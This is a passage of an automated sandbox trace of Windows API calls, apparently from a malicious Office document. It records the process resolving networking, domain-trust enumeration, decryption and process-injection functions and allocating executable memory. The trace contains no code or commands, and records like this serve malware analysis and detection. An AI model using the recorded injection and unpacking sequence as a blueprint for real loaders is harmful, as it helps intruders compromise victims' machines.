(hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.022] DeleteObject (ho=0x0) returned 0 [0139.022] DeleteObject (ho=0x0) returned 0 [0139.022] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.023] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] DeleteObject (ho=0x0) returned 0 [0139.024] DeleteObject (ho=0x0) returned 0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.024] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.025] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] DeleteObject (ho=0x0) returned 0 [0139.026] DeleteObject (ho=0x0) returned 0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.026] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.027] DeleteObject (ho=0x0) returned 0 [0139.028] DeleteObject (ho=0x0) returned 0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.028] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] DeleteObject (ho=0x0) returned 0 [0139.029] DeleteObject (ho=0x0) returned 0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.029] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.030] LoadCursorW (hInstance=0x0, lpCursorName=0xe49) returned 0x0 [0139.752] GetProcAddress (hModule=0x75c50000, lpProcName="LoadLibraryExA") returned 0x75c64913 [0139.752] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75c50000 [0139.752] GetProcAddress (hModule=0x75c50000, lpProcName="GetProcAddress") returned 0x75c61222 [0139.752] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualAlloc") returned 0x75c61856 [0139.752] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualFree") returned 0x75c6186e [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="UnmapViewOfFile") returned 0x75c61826 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualProtect") returned 0x75c6435f [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="LoadLibraryExA") returned 0x75c64913 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="GetModuleHandleA") returned 0x75c61245 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="GetModuleHandleW") returned 0x75c634b0 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="CreateFileA") returned 0x75c653c6 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="SetFilePointer") returned 0x75c617d1 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="WriteFile") returned 0x75c61282 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="CloseHandle") returned 0x75c61410 [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="GetTempPathA") returned 0x75c8276c [0139.753] GetProcAddress (hModule=0x75c50000, lpProcName="lstrlenA") returned 0x75c65a4b [0139.754] GetProcAddress (hModule=0x75c50000, lpProcName="lstrcatA") returned 0x75c82b7a [0139.754] GetProcAddress (hModule=0x75c50000, lpProcName="FreeLibrary") returned 0x75c634c8 [0139.754] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualAlloc") returned 0x75c61856 [0139.754] VirtualAlloc (lpAddress=0x0, dwSize=0x6400, flAllocationType=0x3000, flProtect=0x40) returned 0x220000 [0139.755] VirtualAlloc (lpAddress=0x0, dwSize=0xa000, flAllocationType=0x3000, flProtect=0x40) returned 0x270000 [0139.756] LoadLibraryExA (lpLibFileName="WININET.dll", hFile=0x0, dwFlags=0x0) returned 0x75410000 [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="InternetOpenA") returned 0x7543f18e [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="HttpSendRequestA") returned 0x754a18f8 [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="InternetCloseHandle") returned 0x7542ab49 [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="HttpQueryInfoA") returned 0x7542a33e [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="InternetCrackUrlA") returned 0x7541d075 [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="HttpOpenRequestA") returned 0x75434c7d [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="InternetSetOptionA") returned 0x754275e8 [0139.773] GetProcAddress (hModule=0x75410000, lpProcName="InternetQueryOptionA") returned 0x75421b56 [0139.774] GetProcAddress (hModule=0x75410000, lpProcName="InternetReadFile") returned 0x7542b406 [0139.774] GetProcAddress (hModule=0x75410000, lpProcName="InternetConnectA") returned 0x754349e9 [0139.774] LoadLibraryExA (lpLibFileName="IPHLPAPI.DLL", hFile=0x0, dwFlags=0x0) returned 0x73d80000 [0140.034] GetProcAddress (hModule=0x73d80000, lpProcName="GetAdaptersAddresses") returned 0x73d86a4d [0140.034] LoadLibraryExA (lpLibFileName="NETAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x65240000 [0140.330] GetProcAddress (hModule=0x65240000, lpProcName="DsEnumerateDomainTrustsA") returned 0x65216769 [0140.595] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x775a0000 [0140.595] GetProcAddress (hModule=0x775a0000, lpProcName="RtlDecompressBuffer") returned 0x7765fded [0140.595] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75c50000 [0140.595] GetProcAddress (hModule=0x75c50000, lpProcName="K32GetProcessImageFileNameA") returned 0x75d08c2e [0140.595] GetProcAddress (hModule=0x75c50000, lpProcName="K32EnumProcesses") returned 0x75c8691f [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="GetComputerNameA") returned 0x75c7b6e0 [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="HeapAlloc") returned 0x775ce026 [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="HeapFree") returned 0x75c614c9 [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="GetProcessHeap") returned 0x75c614e9 [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="Sleep") returned 0x75c610ff [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="lstrcpyA") returned 0x75c82a9d [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="GetVolumeInformationA") returned 0x75c86dcb [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="GetVersion") returned 0x75c64467 [0140.596] GetProcAddress (hModule=0x75c50000, lpProcName="GetWindowsDirectoryA") returned 0x75c82b0a [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="lstrcatA") returned 0x75c82b7a [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="lstrlenA") returned 0x75c65a4b [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="GetEnvironmentVariableA") returned 0x75c633a0 [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="CreateFileA") returned 0x75c653c6 [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="WriteFile") returned 0x75c61282 [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="GetTempPathA") returned 0x75c8276c [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="GetTempFileNameA") returned 0x75c89d3f [0140.597] GetProcAddress (hModule=0x75c50000, lpProcName="CloseHandle") returned 0x75c61410 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="GetLastError") returned 0x75c611c0 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="TerminateProcess") returned 0x75c7d802 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="CreateThread") returned 0x75c634d5 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="CreateRemoteThread") returned 0x75ce416b [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="ResumeThread") returned 0x75c643ef [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="CreateProcessA") returned 0x75c61072 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="GetProcessId") returned 0x75c8cf04 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="GetThreadContext") returned 0x75c879d4 [0140.598] GetProcAddress (hModule=0x75c50000, lpProcName="SetThreadContext") returned 0x75ce5393 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="OpenProcess") returned 0x75c61986 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="GetSystemInfo") returned 0x75c649ca [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualAlloc") returned 0x75c61856 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualFree") returned 0x75c6186e [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualAllocEx") returned 0x75c7d9b0 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="WriteProcessMemory") returned 0x75c7d9e0 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualFreeEx") returned 0x75c7d9c8 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="GetModuleHandleA") returned 0x75c61245 [0140.599] GetProcAddress (hModule=0x75c50000, lpProcName="GetProcAddress") returned 0x75c61222 [0140.600] GetProcAddress (hModule=0x75c50000, lpProcName="LoadLibraryA") returned 0x75c649d7 [0140.600] GetProcAddress (hModule=0x75c50000, lpProcName="lstrcmpiA") returned 0x75c63e8e [0140.600] LoadLibraryExA (lpLibFileName="USER32.dll", hFile=0x0, dwFlags=0x0) returned 0x755e0000 [0140.600] GetProcAddress (hModule=0x755e0000, lpProcName="wsprintfA") returned 0x7560ae5f [0140.600] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x75920000 [0140.600] GetProcAddress (hModule=0x75920000, lpProcName="CryptReleaseContext") returned 0x7592e124 [0140.600] GetProcAddress (hModule=0x75920000, lpProcName="CryptDestroyHash") returned 0x7592df66 [0140.600] GetProcAddress (hModule=0x75920000, lpProcName="CryptHashData") returned 0x7592df36 [0140.600] GetProcAddress (hModule=0x75920000, lpProcName="CryptCreateHash") returned 0x7592df4e [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="CryptDecrypt") returned 0x75963178 [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="CryptDestroyKey") returned 0x7592c51a [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="CryptDeriveKey") returned 0x75963188 [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="OpenProcessToken") returned 0x75934304 [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="CryptAcquireContextA") returned 0x759291dd [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="LookupAccountSidA") returned 0x75961daa [0140.601] GetProcAddress (hModule=0x75920000, lpProcName="GetTokenInformation") returned 0x7593431c [0140.601] VirtualProtect (in: lpAddress=0x271000, dwSize=0x2be9, flNewProtect=0x160178, lpflOldProtect=0x1af3f0 | out: lpflOldProtect=0x1af3f0*=0x220000) returned 0 [0140.603] VirtualProtect (in: lpAddress=0x274000, dwSize=0xc22, flNewProtect=0x160158, lpflOldProtect=0x1af3f0 | out: lpflOldProtect=0x1af3f0*=0x220000) returned 0 [0140.603] VirtualProtect (in: lpAddress=0x275000, dwSize=0x22a4, flNewProtect=0x160160, lpflOldProtect=0x1af3f0 | out: lpflOldProtect=0x1af3f0*=0x220000) returned 0 [0140.604] VirtualProtect (in: lpAddress=0x278000, dwSize=0x1e0, flNewProtect=0x160158, lpflOldProtect=0x1af3f0 | out: lpflOldProtect=0x1af3f0*=0x220000) returned 0 [0140.604] VirtualProtect (in: lpAddress=0x279000, dwSize=0x1ec, flNewProtect=0x160158, lpflOldProtect=0x1af3f0 | out: lpflOldProtect=0x1af3f0*=0x220000) returned 0 [0140.604] GetProcAddress (hModule=0x75c50000, lpProcName="VirtualAlloc") returned 0x75c61856 [0140.604] VirtualAlloc (lpAddress=0x0, dwSize=0x384, flAllocationType=0x3000, flProtect=0x40) returned 0x280000 [0140.605] GetModuleHandleA (lpModuleName=0x0) returned 0x2f0000 [0140.605] LoadLibraryExA (lpLibFileName="C:\\Program Files (x86)\\Microsoft Office\\root\\Client\\AppVIsvSubsystems32.dll", hFile=0x0, dwFlags=0x0) returned 0x72180000 [0140.605] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75c50000 [0140.605] VirtualProtect (in: lpAddress=0x2f102c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x1af3c8 | out: lpflOldProtect=0x1af3c8*=0x20) returned 1 [0140.605] VirtualProtect (in: lpAddress=0x2f102c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x1af3c8 | out: lpflOldProtect=0x1af3c8*=0x40) returned 1 [0140.607] LoadLibraryExA (lpLibFileName="C:\\Program Files (x86)\\Microsoft Office\\root\\Client\\AppVIsvSubsystems32.dll", hFile=0x0, dwFlags=0x0) returned 0x72180000 [0140.607] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75c50000 [0140.608] LoadLibraryExA (lpLibFileName="USER32.dll", hFile=0x0, dwFlags=0x0) returned 0x755e0000 [0140.608] LoadLibraryExA (lpLibFileName="msvcrt.dll", hFile=0x0, dwFlags=0x0) returned 0x75530000 [0140.608] LoadLibraryExA (lpLibFileName="imagehlp.dll", hFile=0x0, dwFlags=0x0) returned 0x75210000 [0140.608] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x775a0000 [0140.640] GetProcessHeap () returned 0x370000 [0140.640] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x100000) returned 0x2470020 [0140.641] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x100000) returned 0x2580020 [0140.641] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1000) returned 0x3fd170 [0140.641] GetVersion () returned 0x1db10106 [0140.642] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x8000) returned 0x41c198 [0140.642] GetAdaptersAddresses (in: Family=0x2, Flags=0x0, Reserved=0x0, AdapterAddresses=0x41c198, SizePointer=0x1ae3d4*=0x8000 | out: AdapterAddresses=0x41c198*(Alignment=0xe00000178, Length=0x178, IfIndex=0xe, Next=0x41c4b8, AdapterName="{954905E5-5ED1-4BAF-AC14-2C2B8B445E08}", FirstUnicastAddress=0x41c3d8, FirstAnycastAddress=0x0, FirstMulticastAddress=0x41c418, FirstDnsServerAddress=0x41c490, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #3", FriendlyName="Local Area Connection 3", PhysicalAddress=([0]=0x0, [1]=0x1f, [2]=0x64, [3]=0x2b, [4]=0x56, [5]=0x86, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xe, ZoneIndices=([0]=0xe, [1]=0xe, [2]=0xe, [3]=0xe, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000008000000, Dhcpv4Server.lpSockaddr=0x41c310*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, 